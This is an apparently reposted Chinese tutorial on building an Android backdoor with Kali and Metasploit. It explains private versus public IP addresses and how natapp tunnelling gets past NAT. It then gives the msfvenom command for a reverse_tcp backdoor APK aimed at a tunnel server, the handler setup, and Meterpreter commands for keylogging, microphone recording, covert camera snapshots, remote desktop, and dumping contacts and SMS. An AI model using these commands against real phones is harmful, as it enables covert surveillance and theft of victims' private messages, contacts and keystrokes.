使用kali(外網)生成木馬入侵安卓手機


經常使用metsploit的同學可能會有疑問,為啥我只能在同一局域網里面滲透主機呢?......

這主要是因為你的身處於內網之中。不知道大家對內網和外網的理解是什么?這里我給大家普及一下吧!

什么是內網?內網接入方式:上網的計算機得到的IP地址是Inetnet上的保留地址,保留地址有如下3種形式:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x內網的計算機以NAT(網絡地址轉換)協議,通過一個公共的網關訪問Internet。內網的計算機可Internet上的其他計算機發送連接請求,但Internet上其他的計算機無法向內網的計算機發送連接請求。

什么是外網(也稱為公網)?使用ADSL的用戶,如果只有一個用戶一台計算機在使用此寬帶,沒有使用路由功能,而是用撥號軟件直接撥號上網的,這種情況下,該用戶目前所處的網絡為外網,外網的用戶都擁有一個屬於自己的獨立IP地址.公網的計算機和Internet上的其他計算機可隨意互相訪問。

如何判斷你是網絡是內網還是外網呢?輸入WIN+R進去MS-DOS命令行里面,輸入:ipconfig看一下自己的ip:如果你的IP地址屬於保留地址(保留地址開頭為:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x)那么你的計算機就是運行在局域網內。

使用natapp服務/內網穿透工具Ngrok 。

這里以natapp進行實驗

你在natapp官網注冊好后獲得一條免費隧道,添加tcp通道,端口號自定,例如2018,ip填127.0.0.1

在linux下首先下載natapp的客戶端,然后再命令行內啟動natapp     語句:   ./natapp -authtoken=************       后面的星號換成自己的口令

(如果提示權限不夠  chmod a+x natapp )

啟動成功后可以看到下面圖片

ping 一下第一個圈內的服務器 得到ip地址120.3.51.1    后面位端口號 34611

開始生成外網小馬

msfvenom -p android/meterpreter/reverse_tcp LHOST=120.3.51.1 LPORT=34611 R > android_backdoor.apk

一定要注意ip和端口填服務器的

將apk文件安裝到安卓手機上。

啟動  msfconsole

依次輸入下面的命令

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 127.0.0.1

set lport 2018

監聽127.0.0.1:2018                        (內網穿透相當於先將數據發給服務器,然后由服務器發給內網中的我們 )

啟動run

用你的電話卡流量試試看打開app

keyscan_start:開始鍵盤記錄
keyscan_dump:下載鍵盤記錄
keyscan_stop:結束鍵盤記錄

record_mic:錄制聲音(如果目標主機上有話筒的話)
webcam_chat:查看攝像頭接口

webcam_stream  //開啟攝像頭

webcam_list:查看攝像頭列表
webcam_snap //隱秘拍照功能

webcam_snap 隱秘拍照功能 -i 1 或者2是開啟前置攝像頭和后置攝像頭的

run vnc:開啟遠程桌面
dump_contacts //導出電話號碼
dump_sms  //導出信息
可以輸入?查看更多命令

轉載:https://www.cnblogs.com/jjj-fly/p/7228785.html

https://www.freebuf.com/sectool/162046.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM